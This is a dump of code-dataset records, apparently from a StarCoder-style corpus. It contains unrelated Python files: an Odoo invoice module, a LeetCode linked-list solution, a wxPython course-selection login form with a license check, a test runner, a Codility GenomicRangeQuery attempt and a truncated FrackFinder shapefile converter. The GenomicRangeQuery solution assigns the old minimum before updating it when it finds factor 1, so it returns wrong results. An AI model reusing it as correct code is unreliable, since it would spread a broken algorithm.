self.env.ref('account.email_template_edi_invoice', raise_if_not_found=False)\n if self.is_printing_inv:\n template_rec = self.env['mail.template'].sudo().search([('name', 'ilike', '3D-Printing-Service-Invoice: Send by email')], limit=1)\n if template_rec:\n template = template_rec\n lang = get_lang(self.env)\n if template and template.lang:\n lang = template._render_template(template.lang, 'account.move', self.id)\n else:\n lang = lang.code\n compose_form = self.env.ref('account.account_invoice_send_wizard_form', raise_if_not_found=False)\n ctx = dict(\n default_model='account.move',\n default_res_id=self.id,\n # For the sake of consistency we need a default_res_model if\n # default_res_id is set. Not renaming default_model as it can\n # create many side-effects.\n default_res_model='account.move',\n default_use_template=bool(template),\n default_template_id=template and template.id or False,\n default_composition_mode='comment',\n mark_invoice_as_sent=True,\n custom_layout=\"mail.mail_notification_paynow\",\n model_description=self.with_context(lang=lang).type_name,\n force_email=True\n )\n return {\n 'name': _('Send Invoice'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'account.invoice.send',\n 'views': [(compose_form.id, 'form')],\n 'view_id': compose_form.id,\n 'target': 'new',\n 'context': ctx,\n }\n\n\nclass SaleOrder(models.Model):\n\n _inherit = 'sale.order'\n\n is_printing_inv = fields.Boolean(string='Is Printing Template?', store=True, related='sale_order_template_id.is_printing_inv')\n\n def _find_mail_template(self, force_confirmation_template=False):\n template_id = False\n\n if force_confirmation_template or (self.state == 'sale' and not self.env.context.get('proforma', False)):\n template_id = int(self.env['ir.config_parameter'].sudo().get_param('sale.default_confirmation_template'))\n template_id = self.env['mail.template'].search([('id', '=', template_id)]).id\n if not template_id:\n template_id = self.env['ir.model.data'].xmlid_to_res_id('sale.mail_template_sale_confirmation', raise_if_not_found=False)\n if not template_id:\n template_id = self.env['ir.model.data'].xmlid_to_res_id('sale.email_template_edi_sale', raise_if_not_found=False)\n if self.is_printing_inv:\n template = self.env['mail.template'].search([('name', '=', 'Sales Order 3D Printing Service')], limit=1)\n if template:\n template_id = template.id\n\n return template_id\n\n def _prepare_invoice(self):\n \"\"\"\n Prepare the dict of values to create the new invoice for a sales order. This method may be\n overridden to implement custom invoice generation (making sure to call super() to establish\n a clean extension chain).\n \"\"\"\n self.ensure_one()\n # ensure a correct context for the _get_default_journal method and company-dependent fields\n self = self.with_context(default_company_id=self.company_id.id, force_company=self.company_id.id)\n journal = self.env['account.move'].with_context(default_type='out_invoice')._get_default_journal()\n if not journal:\n raise UserError(_('Please define an accounting sales journal for the company %s (%s).') % (self.company_id.name, self.company_id.id))\n\n invoice_vals = {\n 'is_printing_inv': self.is_printing_inv,\n 'ref': self.client_order_ref or '',\n 'type': 'out_invoice',\n 'narration': self.note,\n 'currency_id': self.pricelist_id.currency_id.id,\n 'campaign_id': self.campaign_id.id,\n 'medium_id': self.medium_id.id,\n 'source_id': self.source_id.id,\n 'invoice_user_id': self.user_id and self.user_id.id,\n 'team_id': self.team_id.id,\n 'partner_id': self.partner_invoice_id.id,\n 'partner_shipping_id': self.partner_shipping_id.id,\n 'invoice_partner_bank_id': self.company_id.partner_id.bank_ids[:1].id,\n 'fiscal_position_id': self.fiscal_position_id.id or self.partner_invoice_id.property_account_position_id.id,\n 'journal_id': journal.id, # company comes from the journal\n 'invoice_origin': self.name,\n 'invoice_payment_term_id': self.payment_term_id.id,\n 'invoice_payment_ref': self.reference,\n 'transaction_ids': [(6, 0, self.transaction_ids.ids)],\n 'invoice_line_ids': [],\n 'company_id': self.company_id.id,\n }\n return invoice_vals\n\n\nclass SaleAdvancePaymentInv(models.TransientModel):\n\n _inherit = \"sale.advance.payment.inv\"\n\n def _prepare_invoice_values(self, order, name, amount, so_line):\n invoice_vals = {\n 'is_printing_inv': order.is_printing_inv,\n 'ref': order.client_order_ref,\n 'type': 'out_invoice',\n 'invoice_origin': order.name,\n 'invoice_user_id': order.user_id.id,\n 'narration': order.note,\n 'partner_id': order.partner_invoice_id.id,\n 'fiscal_position_id': order.fiscal_position_id.id or order.partner_id.property_account_position_id.id,\n 'partner_shipping_id': order.partner_shipping_id.id,\n 'currency_id': order.pricelist_id.currency_id.id,\n 'invoice_payment_ref': order.reference,\n 'invoice_payment_term_id': order.payment_term_id.id,\n 'invoice_partner_bank_id': order.company_id.partner_id.bank_ids[:1].id,\n 'team_id': order.team_id.id,\n 'campaign_id': order.campaign_id.id,\n 'medium_id': order.medium_id.id,\n 'source_id': order.source_id.id,\n 'invoice_line_ids': [(0, 0, {\n 'name': name,\n 'price_unit': amount,\n 'quantity': 1.0,\n 'product_id': self.product_id.id,\n 'product_uom_id': so_line.product_uom.id,\n 'tax_ids': [(6, 0, so_line.tax_id.ids)],\n 'sale_line_ids': [(6, 0, [so_line.id])],\n 'analytic_tag_ids': [(6, 0, so_line.analytic_tag_ids.ids)],\n 'analytic_account_id': order.analytic_account_id.id or False,\n })],\n }\n\n return invoice_vals\n","sub_path":"custom_print_report/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"278586688","text":"# Prompt: https://leetcode.com/problems/middle-of-the-linked-list/submissions/\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def middleNode(self, head: ListNode) -> ListNode:\n node = head\n count = 0\n # find total number of nodes\n while (node.next != None):\n node = node.next\n count += 1\n # find index of middle node\n index = 0\n if count % 2 == 0:\n index = count / 2\n else:\n index= count / 2 + 1\n node = head\n # get middle node\n for i in range(int(index)):\n node = node.next\n return node\n","sub_path":"0. Easy/0876. Middle of the Linked List/middle.py","file_name":"middle.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"312536549","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Author: kerlomz \nimport tkinter\nfrom wx import *\nfrom utils import *\nfrom service import *\nimport menu as m\nfrom auth_dialog import LicenseFrame\nfrom core import Core\nfrom google_rpc import GoogleRPC\n\n\nclass LoginFrame(Frame):\n \"\"\" Login Form \"\"\"\n\n def __init__(self, parent=None, _type=-1, update_ui=None, service=None):\n\n Frame.__init__(self, parent)\n # self.core = Core()\n self.Size = (340, 200)\n self.GUI = GUI(self, SystemConfig.LANGUAGE)\n self.UpdateUI = update_ui\n self.Centre()\n self.AppLogo = Icon(System.resource_path(StaticPath.System.APP_ICON_PATH), BITMAP_TYPE_ICO)\n self.SetIcon(self.AppLogo)\n self.status_bar = self.CreateStatusBar()\n self.Service = service\n self.Service.init(self, self.GUI, self.status_bar)\n self.default_certificate = ['', '']\n self.init_conf()\n self.init()\n\n def init_conf(self):\n decrypted_login_info = RSAUtils.decrypt(LOGIN_INFO, decode=False, local=True)\n default_certificate = Cache.open(decrypted_login_info) if decrypted_login_info else ['', '']\n dynamic_code = Cache.open(RSAUtils.decrypt(DYNAMIC_CODE, decode=False, local=True))\n last_csrf = Cache.open(RSAUtils.decrypt(LAST_CSRF, decode=False, local=True))\n self.default_certificate = default_certificate if default_certificate else self.default_certificate\n self.Service.set_login(self.default_certificate[0], self.default_certificate[1], dynamic_code)\n self.Service.csrf_token = last_csrf if last_csrf else {\n \"Login\": '',\n \"GeneralElectiveCourseList\": '',\n \"GeneralElectiveCoursePost\": '',\n \"CompulsoryCoursePage\": '',\n \"CompulsoryCourseList\": '',\n \"CompulsoryCoursePost\": '',\n }\n\n def init(self):\n \"\"\" Init Form \"\"\"\n self.Title = self.GUI.text(UI.Login.TITLE, SystemConfig.CLIENT_VER)\n panel = Panel(self, NewId())\n\n rect = self.GetClientRect()\n\n label_text = [self.GUI.text(UI.Login.LABEL_ID), self.GUI.text(UI.Login.LABEL_PWD)]\n\n label_widget = [StaticText(\n panel,\n label=text,\n pos=(rect[0] + 15, rect[1] + 15 + i * 35),\n ) for i, text, in enumerate(label_text)]\n\n rect = label_widget[0].Rect\n entry_style = [TE_LEFT | TE_PROCESS_ENTER, TE_PASSWORD | TE_PROCESS_ENTER]\n entry_widget = [TextCtrl(\n panel,\n size=(190, -1),\n pos=(rect[0] + 70, rect[1] - 3 + i * 35),\n style=style\n ) for i, style, in enumerate(entry_style)]\n\n student_code, password = entry_widget[0], entry_widget[1]\n\n student_code.SetValue(self.default_certificate[0])\n password.SetValue(self.default_certificate[1])\n\n if student_code.GetValue():\n password.SetFocus()\n\n rect = entry_widget[1].Rect\n button_submit = Button(\n panel,\n label=self.GUI.text(UI.Login.BUTTON_SUBMIT),\n size=(90, 25),\n pos=(rect[0] + 100, rect[1] + 35)\n )\n\n check_remember = CheckBox(\n panel,\n NewId(),\n label=self.GUI.text(UI.Login.CHECK_BOX_REMEMBER),\n pos=(rect[0] - 70, rect[1] + 40)\n )\n check_remember.SetValue(UserConfig.REMEMBER)\n\n check_remember.Bind(\n EVT_CHECKBOX,\n lambda x: ConfigIO.update('System', 'Remember', check_remember.Value),\n check_remember\n )\n\n def submit(e):\n uid = entry_widget[0].GetValue()\n pwd = entry_widget[1].GetValue()\n self.Service.set_login(uid, pwd)\n stu_code = self.Service.student_code\n print(stu_code)\n auth_code = Core.machine_code_auth(\n stu_code=stu_code,\n c_volume_serial_number=Core.c_volume_serial_number(),\n mac_addr=Core.mac_addr(),\n hostname=Core.hostname()\n )\n if check_remember.IsChecked():\n ConfigIO.update(\n \"Certificate\",\n \"Account\",\n value=RSAUtils.encrypt(Cache.save([uid, pwd]), local=True)\n )\n if auth_code != LICENSE.get(stu_code):\n LicenseFrame(tkinter.Tk(), stu_code=stu_code)\n GUI.alert_error(\n self.GUI.text(UI.Main.Dialog.Error.TITLE),\n self.GUI.text(Msg.Main.LICENSE_ERROR)\n )\n exit(-999)\n\n resp_context = GoogleRPC.verify(stu_code=stu_code)\n if not resp_context or not resp_context.get('success'):\n GUI.alert_error(\n self.GUI.text(UI.Main.Dialog.Error.TITLE),\n self.GUI.text(Msg.Main.LICENSE_ERROR)\n )\n exit(-1)\n raw_cookie = Cache.open(RSAUtils.decrypt(SESSION, decode=False, local=True))\n\n logged_in = self.Service.login_validate(raw_cookie=raw_cookie)\n if logged_in:\n print('状态: Cookie 有效')\n self.Service.agreement_status = True\n resp = {\"message\": None, \"status\": True}\n else:\n resp = self.Service.login_base()\n\n # TODO 上报切换账号\n if self.default_certificate[0] != '' and uid != self.default_certificate[0]:\n print('切换账号预警')\n\n if not UserConfig.COURSE_DATA and NEED_AGREEMENT:\n self.Service.agreement()\n else:\n self.Service.update_general_elective_courses()\n\n if resp['status']:\n # TODO 网络验证,是否有许可\n\n if check_remember.IsChecked():\n ConfigIO.update(\n \"Certificate\",\n \"Account\",\n value=RSAUtils.encrypt(Cache.save([uid, pwd]), local=True)\n )\n else:\n pass\n self.UpdateUI(2)\n else:\n self.status_bar.SetStatusText(\n self.GUI.text(Msg.Login.LOGIN_FAILED, resp['message'])\n )\n return\n\n self.Bind(EVT_BUTTON, submit, button_submit)\n self.Bind(EVT_TEXT_ENTER, submit, password)\n self.GUI.build_menu(self, m.MenuWidget(self, self.Service).menu_data(False))\n","sub_path":"forms/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"195897512","text":"import unittest\nimport os\nimport sys\nfrom datetime import datetime\nimport time\n\nsys.path.append(os.path.join(os.environ[\"ANSYSEM_ROOT211\"],\"PythonFiles\",\"DesktopPlugin\"))\npath_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"..\")\nsys.path.append(path_dir)\n\nos.environ[\"UNITTEST_CURRENT_TEST\"] = \"1\"\nrun_dir = os.path.abspath(os.path.dirname(__file__))\nprint(run_dir)\n\ndef discover_and_run(start_dir, pattern=None):\n \"\"\"Discover and run tests cases, returning the result.\"\"\"\n # use the default shared TestLoader instance\n test_loader = unittest.defaultTestLoader\n\n # automatically discover all tests\n test_suite = test_loader.discover(start_dir, pattern=pattern)\n\n # run the test suite\n log_file = os.path.join(start_dir, 'runner_unittest.log')\n with open(log_file, \"w\") as f:\n f.write(\"Test started {}\\n\".format(datetime.now()))\n runner = unittest.TextTestRunner(f, verbosity=2)\n result = runner.run(test_suite)\n\n\ndiscover_and_run(run_dir, pattern='test_*.py')\n\nsuccess_file = os.path.join(run_dir, 'tests_succeeded.log')\nwith open(success_file, \"w\") as f:\n f.write(\"ok\")\n","sub_path":"_unittest_ironpython/run_unittests.py","file_name":"run_unittests.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"63015921","text":"# 基因組合是 A C G T,分別的 factor 為 1-4\n# S 為 string,代表一串基因序列。長度為 N 個 ex: S = \"CAGCCTA\"\n# P array 指的是開頭第 X 個基因,總共 M 個數字 ex: P = [2, 5, 0]\n# Q array 指的是結尾第 X 個基因,總共 M 個數字 ex: Q = [4, 5, 6]\n# 位置上來說 P[K] <= Q[K]\n# 計算每一對 (P, Q) 中最小的 factor\n# ex: (P[0], Q[0]) --> (2, 4) index 2~4 的字串為 GCC,那最小 factor 為 2\n# ex: (P[1], Q[1]) --> (5, 5) index 5 的字串為 T,那最小 factor 為 4\n# ex: (P[2], Q[2]) --> (0, 6) index 0~6 的字串為整串 S,那最小 factor 為 1\n# result 要回傳一個 array 格式:[2, 4, 1]\n\nimport sys\n\ndef solution(S, P, Q):\n \n len_result = len(P)\n len_S = len(S)\n S_factor = []\n result = [0] * len_result\n\n # factor\n # A --> 1; C --> 2; G --> 3; T --> 4; \n for i in S:\n if i == 'A':\n S_factor.append(1)\n elif i == 'C':\n S_factor.append(2) \n elif i == 'G':\n S_factor.append(3)\n elif i == 'T': # T\n S_factor.append(4)\n else:\n sys.exit(1)\n\n\n print(\"S is \", S_factor)\n # the answer is S itself\n if len_S == 1:\n print(\"the answer is S\")\n print(S_factor)\n return S_factor\n exit(0)\n\n else:\n # read (P, Q) pair\n for i in range (0, len_result):\n\n # the factor is [1-4]\n min_factor = 5\n index_start = P[i]\n index_end = Q[i]\n\n print(\"i:\", i, \"; index_start:\", index_start, \"; index_end:\", index_end)\n print(\"===============\")\n \n # find the minmum factor\n if index_start == index_end:\n result[i] = S_factor[index_start]\n print(\"don't need to compare\")\n print(\"the \", i, \" of result is \", int(S_factor[index_start]))\n print(\"result \", result)\n print(\"----------------------------------\")\n else:\n for n in range(index_start, (index_end+1)):\n # factor 1 是最小的,因此找到 1 後不需要繼續往下找,並且離開 for-loop\n if S_factor[n] == 1:\n result[i] = min_factor\n min_factor = S_factor[n]\n print(\"find the minmun and break for-loop\")\n print(\"the \", i, \" of result is \", min_factor)\n print(\"----------------------------------\")\n break\n elif S_factor[n] < min_factor:\n min_factor = S_factor[n]\n print(\"min_factor:\", min_factor)\n result[i] = min_factor\n print(\"result \", result)\n\n print(\"end of search\")\n print(\"the result is \", result)\n return result\n\n\nS = \"CAGCCTA\"\nP = [2, 5, 0, 3]\nQ = [4, 5, 6, 5]\n\n'''\nS = \"T\"\nP = [0]\nQ = [0]\n'''\nsolution(S, P, Q)","sub_path":"Lesson5/GenomicRangeQuery.py","file_name":"GenomicRangeQuery.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"488059029","text":"#!/usr/bin/env python\n\n\n# This document is part of CrowdProjects\n# https://github.com/skytruth/CrowdProjects\n\n\n# =========================================================================== #\n#\n# Copyright (c) 2014, SkyTruth\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the {organization} nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n#\n# =========================================================================== #\n\n\n\"\"\"\nConvert a FrackFinder OH Tadpole 2014 JSON export to a shapefile\ncontaining 1 point per input task and aggregated crowd response\nmetrics.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport json\nfrom os.path import *\nfrom pprint import pprint\ntry:\n from osgeo import ogr\n from osgeo import osr\nexcept ImportError:\n import ogr\n import osr\n\n\n#/* ======================================================================= */#\n#/* Build Information\n#/* ======================================================================= */#\n\n__author__ = 'Kevin Wurster'\n__version__ = '0.1'\n__release__ = '2014/09/09'\n__docname__ = basename(__file__)\n__license__ = \"\"\"\nCopyright (c) 2014, SkyTruth\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the {organization} nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n\n#/* ======================================================================= */#\n#/* Define print_usage() function\n#/* ======================================================================= */#\n\ndef print_usage():\n\n \"\"\"\n Command line usage information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\nUsage: %s [options] task.json task_run.json outfile.shp\n\nOptions:\n --class=str Add a field containing a value, or use %%str to get a field from the JSON\n --help-info Print out a list of help related flags\n --of=driver Output driver name/file type - default='ESRI Shapefile'\n --epsg=int EPSG code for coordinates in task.json - default='4326'\n --overwrite Overwrite the output file\n\"\"\" % __docname__)\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_license() function\n#/* ======================================================================= */#\n\ndef print_license():\n\n \"\"\"\n Print out license information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(__license__)\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_help() function\n#/* ======================================================================= */#\n\ndef print_help():\n\n \"\"\"\n Detailed help information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\nHelp: {0}\n------{1}\nPyBossa exports tasks in two ways: task.json and task_run.json This utility\nlooks at each task in task.json and sifts through its matching task_run.json\nto calculate a variety of metrics, like how many times the task was shown,\nhow many times the crowd, how many times the crowd picked each possible answer,\nand how confident the crowd was in its decision.\n\nIt is possible for the crowd to be split and pick two different choices an\nequal number of times. The output for these cases is pipe delimited.\n \"\"\".format(__docname__, '-' * len(__docname__)))\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_help_info() function\n#/* ======================================================================= */#\n\ndef print_help_info():\n\n \"\"\"\n Print a list of help related flags\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\nHelp flags:\n --help More detailed description of this utility\n --usage Arguments, parameters, flags, options, etc.\n --version Version and ownership information\n --license License information\n \"\"\")\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_version() function\n#/* ======================================================================= */#\n\ndef print_version():\n\n \"\"\"\n Print script version information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\n%s version %s - released %s\n \"\"\" % (__docname__, __version__, __release__))\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define get_crowd_selection() function\n#/* ======================================================================= */#\n\ndef get_crowd_selection(selection_count, selection_map):\n\n \"\"\"\n Figure out what the crowd actually selected\n\n :param selection_count: the number of responses for each selection\n :type selection_count: dict\n :param selection_map: maps output file fields to selections\n :type selection_map: dict\n\n :return: the crowd's selection for a given group of selections or None\n :rtype: str|unicode|None\n \"\"\"\n\n # Cache containers\n crowd_selection = 'NONE'\n\n # Figure out what the maximum number of selections was\n max_selection = max(selection_count.values())\n\n # Build the crowd_selection\n if max_selection is 0:\n crowd_selection = None\n else:\n for selection, count in selection_count.iteritems():\n if count is max_selection:\n if crowd_selection == 'NONE':\n crowd_selection = selection_map[selection]\n else:\n crowd_selection += '|' + selection_map[selection]\n\n # Return to user\n return crowd_selection\n\n\n#/* ======================================================================= */#\n#/* Define get_crowd_selection_counts() function\n#/* ======================================================================= */#\n\ndef get_crowd_selection_counts(input_id, task_runs_json_object):\n\n \"\"\"\n Figure out how many times the crowd selected each option\n\n :param input_id: the id for a given task\n :type input_id: int\n :param task_runs_json_object: all of the input task_runs from json.load(open('task_run.json'))\n :type task_runs_json_object: list\n\n :return: number of responses for each selection\n :rtype: dict\n \"\"\"\n\n counts = {'n_nop_res': 0,\n 'n_unk_res': 0,\n 'n_pad_res': 0,\n 'ERROR': 0}\n for task_run in task_runs_json_object:\n if input_id == task_run['task_id']:\n try:\n selection = task_run['info']['selection']\n except KeyError:\n selection = 'ERROR'\n if selection == 'nopad':\n counts['n_nop_res'] += 1\n elif selection == 'unknown':\n counts['n_unk_res'] += 1\n elif selection == 'pad':\n counts['n_pad_res'] += 1\n else:\n counts['ERROR'] += 1\n return counts\n\n\n#/* ======================================================================= */#\n#/* Define get_percent_crowd_agreement() function\n#/* ======================================================================= */#\n\ndef get_percent_crowd_agreement(crowd_selection, selection_counts, total_responses, map_selection_field,\n error_val=None):\n\n \"\"\"\n Figure out how well the crowd agreed and if two answers tied, figure out the agreement for both\n\n :param crowd_selection: the winning selection for a given task\n :type crowd_selection: str|unicode|None\n :param selection_counts: number of responses for each count\n :type selection_counts: dict\n :param total_responses: total number of responses\n :type total_responses: int\n :param map_selection_field: maps selections to output file field names\n :type map_selection_field: dict\n :param error_val: set crowd agreement to this value if any errors are encountered\n :type error_val: str|unicode|None\n\n :return: percent crowd agreement and percent crowd agreement\n :rtype: dict\n \"\"\"\n\n # Compute crowd agreement\n # The try/except blocks are for situations where tasks have never been viewed, which yields zero total_responses\n per_crowd_agreement = None\n split_per_crowd_agreement = None\n\n # Make sure the crowd actually made a selection\n if crowd_selection is None:\n per_crowd_agreement = None\n split_per_crowd_agreement = None\n elif total_responses is 0:\n per_crowd_agreement = error_val\n split_per_crowd_agreement = error_val\n else:\n if '|' not in crowd_selection:\n try:\n per_crowd_agreement = int(selection_counts[map_selection_field[crowd_selection]] * 100 / total_responses)\n except ZeroDivisionError:\n per_crowd_agreement = error_val\n else:\n\n # Compute percent agreement for each split response\n for selection in crowd_selection.split('|'):\n field_name = map_selection_field[selection]\n selection_count = selection_counts[field_name]\n try:\n per_crowd_agreement = int(selection_count * 100 / total_responses)\n except ZeroDivisionError:\n per_crowd_agreement = error_val\n if split_per_crowd_agreement is None:\n split_per_crowd_agreement = unicode(per_crowd_agreement)\n else:\n split_per_crowd_agreement += '|' + unicode(per_crowd_agreement)\n\n # Make sure the percent crowd agreement field is None when there is a split response\n per_crowd_agreement = error_val\n return {'p_crd_a': per_crowd_agreement, 'p_s_crd_a': split_per_crowd_agreement}\n\n\n#/* ======================================================================= */#\n#/* Define main() function\n#/* ======================================================================= */#\n\ndef main(args):\n\n \"\"\"\n Main routine\n\n :param args: arguments from the commandline (sys.argv[1:] in order to drop the script name)\n :type args: list\n\n :return: 0 on success and 1 on error\n :rtype: int\n \"\"\"\n\n #/* ======================================================================= */#\n #/* Defaults\n #/* ======================================================================= */#\n\n # OGR defaults\n outfile_driver = 'ESRI Shapefile'\n outfile_epsg_code = 4326\n\n # Output file\n overwrite_outfile = False\n\n #/* ======================================================================= */#\n #/* Containers\n #/* ======================================================================= */#\n\n # Input/output files\n classification = None\n tasks_file = None\n task_runs_file = None\n outfile = None\n\n # Map field names to selections\n map_field_to_selection = {'n_nop_res': 'nopad',\n 'n_unk_res': 'unknown',\n 'n_pad_res': 'pad',\n 'ERROR': 'ERROR'}\n\n # Map selections to field names\n map_selection_to_field = {'nopad': 'n_nop_res',\n 'unknown': 'n_unk_res',\n 'pad': 'n_pad_res',\n 'ERROR': 'ERROR'}\n\n #/* ======================================================================= */#\n #/* Defaults\n #/* ======================================================================= */#\n\n arg_error = False\n for arg in args:\n\n # Help arguments\n if arg in ('--license', '-license'):\n return print_license()\n elif arg in ('--usage', '-usage'):\n return print_usage()\n elif arg in ('--version', '-version'):\n return print_version()\n elif arg in ('--help', '-help'):\n return print_help()\n elif arg in ('--help-info', '-help-info', '--helpinfo', '--helpinfo'):\n return print_help_info()\n\n # OGR configuration\n elif '--of=' in arg:\n outfile_driver = arg.split('=', 1)[1]\n elif '--epsg=' in arg:\n outfile_epsg_code = arg.split('=', 1)[1]\n\n # Processing options\n elif '--class=' in arg:\n classification = arg.split('=', 1)[1]\n\n # Additional options\n elif arg == '--overwrite':\n overwrite_outfile = True\n\n # Positional arguments and errors\n else:\n\n # Catch task.json file\n if tasks_file is None:\n tasks_file = abspath(arg)\n\n # Catch task_run.json file\n elif task_runs_file is None:\n task_runs_file = abspath(arg)\n\n # Catch output file\n elif outfile is None:\n outfile = abspath(arg)\n\n # Catch unrecognized arguments\n else:\n print(\"ERROR: Invalid argument: %s\" % arg)\n arg_error = True\n\n #/* ======================================================================= */#\n #/* Validate Parameters\n #/* ======================================================================= */#\n\n bail = False\n\n # Check arguments\n if arg_error:\n print(\"ERROR: Did not successfully parse arguments\")\n bail = True\n\n # Check input task.json file\n if tasks_file is None:\n bail = True\n print(\"ERROR: Need a task file\")\n elif not isfile(tasks_file) or not os.access(tasks_file, os.R_OK):\n bail = True\n print(\"ERROR: Can't access file: %s\" % tasks_file)\n\n # Check input task_run.json file\n if task_runs_file is None:\n bail = True\n print(\"ERROR: Need a task run file\")\n elif not isfile(task_runs_file) or not os.access(task_runs_file, os.R_OK):\n bail = True\n print(\"ERROR: Can't access task run file: %s\" % task_runs_file)\n\n # Check output file\n if outfile is None:\n bail = True\n print(\"ERROR: Need an output file\")\n elif not isdir(dirname(outfile)) and not os.access(dirname(outfile), os.W_OK):\n bail = True\n print(\"ERROR: Need write permission: %s\" % dirname(outfile))\n elif not overwrite_outfile and isfile(outfile):\n bail = True\n print(\"ERROR: Output file exists and overwrite=%s: %s\" % (str(overwrite_outfile), outfile))\n\n # Check EPSG code\n try:\n outfile_epsg_code = int(outfile_epsg_code)\n except ValueError:\n bail = True\n print(\"ERROR: Invalid EPSG code - must be an int: %s\" % str(outfile_epsg_code))\n\n if bail:\n return 1\n\n #/* ======================================================================= */#\n #/* Load JSON Data\n #/* ======================================================================= */#\n\n # Load task.json file into a JSON object\n print(\"Loading task file...\")\n with open(tasks_file, 'r') as f:\n tasks_json = json.load(f)\n print(\"Found %s items\" % str(len(tasks_json)))\n\n # Load task_run.json file into a JSON object\n print(\"Loading task run file...\")\n with open(task_runs_file, 'r') as f:\n task_runs_json = json.load(f)\n print(\"Found %s items\" % str(len(task_runs_json)))\n\n #/* ======================================================================= */#\n #/* Create Output OGR Datasource/Layer/Definitions/etc.\n #/* ======================================================================= */#\n\n # Get driver and make sure its valid\n driver = ogr.GetDriverByName(str(outfile_driver))\n if driver is None:\n print(\"ERROR: Invalid OGR driver: %s\" % outfile_driver)\n return 1\n\n # Overwrite output file if it exists then create new datasource\n if isfile(outfile):\n print(\"Overwriting output file: %s\" % outfile)\n driver.DeleteDataSource(outfile)\n print(\"Creating output file: %s\" % outfile)\n data_source = driver.CreateDataSource(outfile)\n\n # Define SRS\n print(\"Defining SRS ...\")\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(outfile_epsg_code)\n\n # Create layer\n print(\"Creating layer ...\")\n layer_name = basename(outfile).split('.')\n layer_name = ''.join(layer_name[:len(layer_name) - 1])\n layer = data_source.CreateLayer(str(layer_name), srs, ogr.wkbPoint)\n\n # Define fields\n print(\"Defining fields ...\")\n fields_definitions = [('id', 10, ogr.OFTInteger),\n ('site_id', 254, ogr.OFTString),\n ('wms_url', 254, ogr.OFTString),\n ('wms_id', 254, ogr.OFTString),\n ('wms_v', 254, ogr.OFTString),\n ('county', 254, ogr.OFTString),\n ('state', 254, ogr.OFTString),\n ('year', 10, ogr.OFTInteger),\n ('location', 254, ogr.OFTString),\n ('n_unk_res', 10, ogr.OFTInteger),\n ('n_nop_res', 10, ogr.OFTInteger),\n ('n_pad_res', 10, ogr.OFTInteger),\n ('n_tot_res', 10, ogr.OFTInteger),\n ('crowd_sel', 254, 